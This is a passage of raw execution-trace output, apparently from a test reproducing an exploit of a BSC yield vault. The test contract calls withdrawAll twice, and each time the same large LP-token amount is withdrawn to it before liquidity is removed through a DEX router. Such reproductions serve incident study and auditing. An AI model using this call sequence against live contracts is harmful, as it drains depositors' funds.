    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [23203] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 411515297079048812211459 [4.115e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 411515297079048812211459 [4.115e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x04388ded71c3fdb0b45ba89e3133076dba6a5c4da99ee2a8f73fa78097ba49f9: 0x000000000000000000000000000000000000000000049a3eda62bf92356fd66b → 0x00000000000000000000000000000000000000000004431a9069c7a9e5ba2968
    │   │   │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Withdraw(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 7, amount: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96088: 0x00000000000000000000000000000000000000000000254b58096cb4bafd343d → 0x0000000000000000000000000000000000000000000012d46399e662fc86ac24
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96087: 0x00000000000000000000000000000000000000000000b001878a5c7f19b54f5c → 0x0000000000000000000000000000000000000000000058dd3d916496c9ffa259
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [23203] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Withdrawn(: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 411515297079048812211459 [4.115e23], : 8530973 [8.53e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   └─ ← [Stop]
    │   │   ├─ [215964] 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8::withdrawAll()
    │   │   │   ├─ [864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 866216599017099835164 [8.662e20]
    │   │   │   ├─ [20390] 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A::deposit(179, 0)
    │   │   │   │   ├─ [864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 49713200914620457548978 [4.971e22]
    │   │   │   │   ├─ [4147] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [7292] 0x3fEab282Db4762F369e4223Cd132bD5E0591E6F0::transferFrom(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, value: 0)
    │   │   │   │   │   ├─ emit Approval(owner: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, spender: 0x1ac6C0B955B6D7ACb61c9Bdf3EE98E0689e07B8A, value: 115792089237316195423570985008687907853269984665640564039456584007913129639935 [1.157e77])
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Deposit(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 179, amount: 0)
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 866216599017099835164 [8.662e20]
    │   │   │   ├─ [14844] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::deposit(7, 0)
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14503826275221050979426760 [1.45e25]
    │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [3576] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transferFrom(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Deposit(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 7, amount: 0)
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x4a405F407F603C00599D11788518CEc34bbB4de6, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x4a405F407F603C00599D11788518CEc34bbB4de6, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [788] 0x4a405F407F603C00599D11788518CEc34bbB4de6::chargeFees(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0x6B3C201575aCe5Ed6B67df5c91E40B98c0D2BE36)
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 26981098122313554467648 [2.698e22]
    │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x2B706F9a9514FADCed91A45Db89486E26a41244A, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [89279] 0x2B706F9a9514FADCed91A45Db89486E26a41244A::convert(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096)
    │   │   │   │   ├─ [81446] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::depositAll()
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2B706F9a9514FADCed91A45Db89486E26a41244A) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [4984] 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d::balanceOf() [staticcall]
    │   │   │   │   │   │   ├─ [705] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::userInfo(2, 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 296482284392627878830733 [2.964e23], 2826842308435780052328718 [2.826e24]
    │   │   │   │   │   │   ├─ [366] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 22671506163907381737115170 [2.267e25]
    │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 22671507756136738512174081 [2.267e25]
    │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 112182571482734940 [1.121e17]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000003ec85813cfa6935f4b57
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [6037] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transferFrom(0x2B706F9a9514FADCed91A45Db89486E26a41244A, 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, 0)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, to: 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, value: 0)
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, spender: 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, value: 115792089237316195423570985008687907853269984665640563847182238495391880674745 [1.157e77])
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, value: 0)
    │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x54f4D5dd6164B99603E77C8E13FFC3B239F63147) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 0)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147, to: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, value: 0)
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [51265] 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d::deposit()
    │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 112182571482734940 [1.121e17]
    │   │   │   │   │   │   ├─ [30925] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::enter(112182571482734940 [1.121e17])
    │   │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 22671507756136738512174081 [2.267e25]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, value: 112182563604106594 [1.121e17])
    │   │   │   │   │   │   │   ├─ [6037] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transferFrom(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e, 112182571482734940 [1.121e17])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, to: 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e, value: 112182571482734940 [1.121e17])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, spender: 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e, value: 115792089237316195423570985008687907853269984665640559866953335615530424220032 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0x000000000000000000000000000000000000000000000000018e8d745337e15c → 0
    │   │   │   │   │   │   │   │   │   @ 0x98d68177c27d5b5adf8e14f141ff1758c211937bc08c43ec932a7f2442efbe49: 0xfffffffffffffffffffffffffffffffffffffffffffc8c7018f86f8c56c61adc → 0xfffffffffffffffffffffffffffffffffffffffffffc8c701769e218038e3980
    │   │   │   │   │   │   │   │   │   @ 0x5d0038da2cacb59f8e8e0c42231de65404b9930270f8183b7bd94fca2633c8c3: 0x00000000000000000000000000000000000000000012c0e0e5ec4236630ffc01 → 0x00000000000000000000000000000000000000000012c0e0e77acfaab647dd5d
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0 → 0x000000000000000000000000000000000000000000000000018e8d727d9d8d62
    │   │   │   │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000012c0e0cfd3860c67894e22 → 0x00000000000000000000000000000000000000000012c0e0d162137ee526db84
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [444] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::balanceOf(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 112182563604106594 [1.121e17]
    │   │   │   │   │   │   ├─ [17127] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::deposit(2, 112182563604106594 [1.121e17])
    │   │   │   │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 14503826275221050979426760 [1.45e25]
    │   │   │   │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 0)
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, value: 0)
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [5859] 0x15B9462d4Eb94222a7506Bc7A25FB27a2359291e::transferFrom(0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, 112182563604106594 [1.121e17])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, to: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 112182563604106594 [1.121e17])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, spender: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, value: 115792089237316195423570985008687907853269984665640559866953361900789344514376 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa4dde37bed60c0164ab8b32bea67d158f071732381d51799399491cb0b91c973: 0x000000000000000000000000000000000000000000000000018e8d727d9d8d62 → 0
    │   │   │   │   │   │   │   │   │   @ 0x80bc848f55b8b24f5a83c3458d16fa75c491cae34bbe2c2d38c5062e4b2f62d5: 0x000000000000000000000000000000000000000000129f5903bec70da4da21dd → 0x000000000000000000000000000000000000000000129f59054d54802277af3f
    │   │   │   │   │   │   │   │   │   @ 0x17e84f37568429749640c1f17c62169e6f8d0b2c7da71cc88d878be7c7a4e945: 0xfffffffffffffffffffffffffffffffffffffffffffc8c701955d1d841f1beaa → 0xfffffffffffffffffffffffffffffffffffffffffffc8c7017c74465c4543148
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ emit Deposit(user: 0x620B96B439E95B0E5b1451aBDF40B6003fC2cf5d, pid: 2, amount: 112182563604106594 [1.121e17])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x17e84f37568429749640c1f17c62169e6f8d0b2c7da71cc88d878be7c7a4e945: 0xfffffffffffffffffffffffffffffffffffffffffffc8c701955d1d841f1beaa → 0xfffffffffffffffffffffffffffffffffffffffffffc8c7017c74465c4543148
    │   │   │   │   │   │   │   │   @ 0x55a3e97a38f959a6dfdb5f04f11a2f5e46de051ebe2bde60aa73ecbd934e060c: 0x000000000000000000000000000000000000000000003ec8563b48a12cbd228d → 0x000000000000000000000000000000000000000000003ec857c9d613aa5aafef
    │   │   │   │   │   │   │   │   @ 0x55a3e97a38f959a6dfdb5f04f11a2f5e46de051ebe2bde60aa73ecbd934e060d: 0x00000000000000000000000000000000000000000002569b6db8fde55332210e → 0x00000000000000000000000000000000000000000002569b7c9108a96063c390
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Deposited(: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, : 0, : 8530973 [8.53e6])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x2B706F9a9514FADCed91A45Db89486E26a41244A) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [3530] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x2B706F9a9514FADCed91A45Db89486E26a41244A, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x55a3e97a38f959a6dfdb5f04f11a2f5e46de051ebe2bde60aa73ecbd934e060d: 0x00000000000000000000000000000000000000000002569b6db8fde55332210e → 0x00000000000000000000000000000000000000000002569b7c9108a96063c390
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 26981098122313554467648 [2.698e22]
    │   │   │   ├─ [864] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 866216599017099835164 [8.662e20]
    │   │   │   ├─ [6147] 0xAcD7B3D9c10e97d0efA418903C0c7669E702E4C0::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [541] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 26981098122313554467648 [2.698e22]
    │   │   │   ├─ [5530] 0x54f4D5dd6164B99603E77C8E13FFC3B239F63147::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 411515297079048812211459 [4.115e23])
    │   │   │   ├─ [537] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::balanceOf(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [40048] 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E::withdraw(7, 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E) [staticcall]
    │   │   │   │   │   └─ ← [Return] 14503826275221050979426760 [1.45e25]
    │   │   │   │   ├─ [3391] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 0)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [26003] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transfer(0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, 411515297079048812211459 [4.115e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x2EBe8CDbCB5fB8564bC45999DAb8DA264E31f24E, to: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, value: 411515297079048812211459 [4.115e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x04388ded71c3fdb0b45ba89e3133076dba6a5c4da99ee2a8f73fa78097ba49f9: 0x00000000000000000000000000000000000000000004431a9069c7a9e5ba2968 → 0x00000000000000000000000000000000000000000003ebf64670cfc196047c65
    │   │   │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Withdraw(user: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, pid: 7, amount: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96088: 0x0000000000000000000000000000000000000000000012d46399e662fc86ac24 → 0x00000000000000000000000000000000000000000000005d6f2a60113e10240b
    │   │   │   │   │   @ 0xd6fa548cc015d7ca8a975b2e8f41c8caabdc80029bbf7ec9cd0f20af0fa96087: 0x0000000000000000000000000000000000000000000058dd3d916496c9ffa259 → 0x0000000000000000000000000000000000000000000001b8f3986cae7a49f556
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3303] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─ emit Transfer(from: 0x27DD6E51BF715cFc0e2fe96Af26fC9DED89e4BE8, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 411515297079048812211459 [4.115e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0x00000000000000000000000000000000000000000000ae4893f1efd09f6b5a06
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Withdrawn(: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 411515297079048812211459 [4.115e23], : 8530973 [8.53e6])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc43a18728dee70c1cf76a513eef739350a6e2b673f21a950d1ef74884d13ae6e: 0x00000000000000000000000000000000000000000002186828da50d33e794120 → 0
    │   │   │   │   @ 2: 0x00000000000000000000000000000000000000000000b001878a5c7f19b54f5c → 0x0000000000000000000000000000000000000000000058dd3d916496c9ffa259
    │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 0x00000000000000000000000000000000000000000000115120a3a1ed94d3d202 → 0
    │   │   │   │   @ 0xc62f97ca733d459a4d4325bda08f3fcc035f10afdf01c6901ad41c80b20f2819: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03 → 0x00000000000000000000000000000000000000000000ae4893f1efd09f6b5a06
    │   │   │   └─ ← [Stop]
    │   │   ├─ [99810] 0x10ED43C718714eb63d5aA57B78B54704E256024E::removeLiquidity(0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 823030594158097624422918 [8.23e23], 449328228768287545012441 [4.493e23], 347583855261065794904977 [3.475e23], Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1624403177 [1.624e9])
    │   │   │   ├─ [27476] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::transferFrom(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, 823030594158097624422918 [8.23e23])
    │   │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, value: 823030594158097624422918 [8.23e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000ae4893f1efd09f6b5a06 → 0
    │   │   │   │   │   @ 0x8bb7630b861534f3d3aad447fe81a0548b79c8e611dc240d52ecf7c18c91a2bf: 0 → 0x00000000000000000000000000000000000000000000ae4893f1efd09f6b5a06
    │   │   │   │   └─ ← [Return] true
